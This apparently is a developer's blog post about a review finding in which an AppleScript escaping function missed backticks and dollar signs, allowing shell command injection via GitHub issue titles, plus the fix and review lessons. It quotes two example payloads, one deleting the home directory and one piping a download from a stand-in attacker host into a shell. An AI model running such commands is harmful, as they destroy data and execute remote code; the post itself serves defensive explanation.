The backtick that could run anything: hardening AppleScript shell escaping

The finding read: “shell command-substitution gap in _escape_for_applescript_literal — backtick and $ were unescaped inside the do script double-quoted string, allowing arbitrary command execution via crafted issue titles.”

That sentence works quietly. The function name implies it escapes things, the double-quoted string implies containment, and the input (a GitHub issue title) implies human text. None of those implications were wrong, exactly. They were just incomplete in precisely the way that matters for security. The Sprint 2.11 review found the gap; it had been sitting in the pipeline since at least Sprint 2.9.

What the function does

The editorial pipeline’s automation pipeline executes shell commands via AppleScript. The pattern is roughly: a Python layer assembles a shell command string, passes it to an AppleScript do script call, and AppleScript hands it to the terminal. For that to work safely, anything that came from outside the system (an issue title, a branch name, a label) needed to be sanitised before it landed inside the AppleScript string literal.

_escape_for_applescript_literal was the function that was supposed to do that. It existed. It had a name that described its job. That is the point where a lot of code reviews stop looking.

The Sprint 2.11 review did not stop there.

The gap

Inside a double-quoted string in a shell command, two character sequences retain their special meaning regardless of quoting: the backtick ` (legacy command substitution) and the dollar sign $ (variable expansion and POSIX $() command substitution). A double-quoted string does not suppress those. It suppresses spaces, glob expansion, word-splitting — but not those.

_escape_for_applescript_literal was escaping characters that break the AppleScript string layer: backslashes, double quotes, the obvious ones. What it was not doing was escaping backticks or dollar signs. Those passed through clean into the do script double-quoted string. The shell then evaluated them.

The exploit surface was wherever user-controlled text reached the function. In this pipeline, the most direct path was a GitHub issue title. If an issue title contained something like `rm -rf ~` or $(curl attacker.example | sh), and that title was interpolated into a shell command via _escape_for_applescript_literal, the shell would execute it when AppleScript handed the string off. Not hypothetically. Literally.

The function was named correctly. It was scoped incorrectly. It knew about the AppleScript escaping problem and missed the shell escaping problem one layer down.

Why this took three sprints to surface

The findings from 2.9 and 2.10 were not small. Sprint 2.10’s MEDIUM findings included removing an intermediate conn.commit() in _apply_merged and _apply_closed_unmerged so that mark_status committed atomically — a real bug, the kind that produces duplicate run.succeeded SSE events on crash. Sprint 2.9 dealt with audit-trail gaps: force=true fires were not writing run.forced events to pipeline_events, and BEGIN IMMEDIATE failures were swallowing the actual error. Those were the reviews that had reviewers’ attention.

The escaping function presumably passed because it existed and its name was accurate. It read as a utility, not a security surface. The Sprint 2.10 LOW findings that shipped on 2026-05-17 were described as “cosmetic or defensive hardening” — spurious conn.commit() removal, stderr logging gaps. Correct and useful, but not the kind of review that prompts you to ask “what characters does this function not handle?”

Sprint 2.11 did ask that question. The answer was backtick and $.

The fix

The fix is not complicated. Before interpolating user-controlled text into a shell command string, escape the characters that retain special meaning inside double quotes. Backtick gets a backslash prefix; so does dollar sign. Those two additions close the command-substitution path.

What makes it worth writing about is not the fix itself. It is the gap between the function’s name and its actual contract. _escape_for_applescript_literal describes one layer of the problem: making the string safe to embed in an AppleScript literal. It does not describe the second layer: making the string safe to evaluate as a shell command. Both layers exist. The function only knew about one of them.

This is a category of bug I have seen in several forms. The name signals completeness. The code delivers partial completeness. The gap between the two is invisible unless you ask: safe against what? The Sprint 2.11 reviewer asked that. The question is the skill; the fix is almost incidental once you have it.

The broader pattern in this pipeline

Looking back across the 2.9, 2.10, and 2.11 sprint reviews, the findings sort into two categories.

The first is atomicity and ordering: commits happening at the wrong point in a transaction, events firing before state is stable, failures swallowing their own error messages. The conn.commit() removals and the BEGIN IMMEDIATE logging fix are both in this category. The risk is data corruption or confusing operational behaviour under failure conditions.

The second is incomplete escaping: functions that handle one layer of a multi-layer encoding problem and silently pass through the layer they missed. The _escape_for_applescript_literal gap is the clearest example. Each layer has its own special characters (Python string, AppleScript literal, shell double-quoted string), and a function that handles one layer correctly gives a false sense of coverage for the others.

Both categories share a structural cause: the code was written at a layer of abstraction where the next layer down was invisible. With the transaction bugs, the Python layer was not tracking what SQLite considered atomic. With the escaping bug, the AppleScript layer was not tracking what the shell considered evaluable. Neither failure looks like carelessness from inside the layer where the code was written. Both look obvious from one layer down.

What I changed in how I review escaping functions

Three things, none of them new ideas, but worth stating as explicit checkpoints rather than intuitions.

Name the threat model in the function comment, not just the transformation. “Escapes a string for use in an AppleScript literal” is a transformation description. “Escapes a string for use in an AppleScript literal passed to do script; the resulting string will be evaluated by the shell, so backtick and $ are also escaped to prevent command substitution” is a threat model. The second version makes the second layer visible to the next person reading the function.

When a function name ends in a layer name (_for_applescript_literal, _for_html_attribute, _for_sql_identifier), ask whether the output passes through another layer. A literal passed to do script passes through the shell. An HTML attribute value passed through a template might pass through JavaScript. An SQL identifier passed to a database might still be evaluated in a context with its own injection surface. The layer named in the function is rarely the last layer.

Treat user-controlled strings as the highest-risk input regardless of their apparent benignness. GitHub issue titles are human-readable text. They feel safe. They are also strings where an attacker has direct write access. Any path from issue title to shell execution is a path worth hardening, even if the realistic attacker population is small. The effort of adding two character escapes is near zero. The effort of explaining a code execution incident is not.

Where this sits in the build

The fix shipped in the Sprint 2.11 review, documented in the devlog entry dated 2026-05-20. The roadmap discipline that formalised how these review findings get tracked (with docs/roadmap.md as the canonical example under the new convention) came four days later on 2026-05-24, as Wave 2 of the roadmap work that Wave 1 had scaffolded in PRs #15 and #1.

The escaping fix is a small entry in that log. Four lines changed. One function tightened. The finding would not make a CVE. The pattern it represents is one I now look for by name: a function whose name promises more coverage than its code delivers. The Sprint 2.11 reviewer named it first. This article is the receipt.

The backtick that could run anything: hardening AppleScript shell escaping

What the function does

The gap

Why this took three sprints to surface

The fix

The broader pattern in this pipeline

What I changed in how I review escaping functions

Where this sits in the build

You might also like

Scope the MySQL user first: the newsletter DDL as a security boundary on cPanel

Six PHP classes, no Composer: a cPanel newsletter backend with enumeration-resistant auth

I hand-wrote the newsletter backend in PHP. The threat model is the code.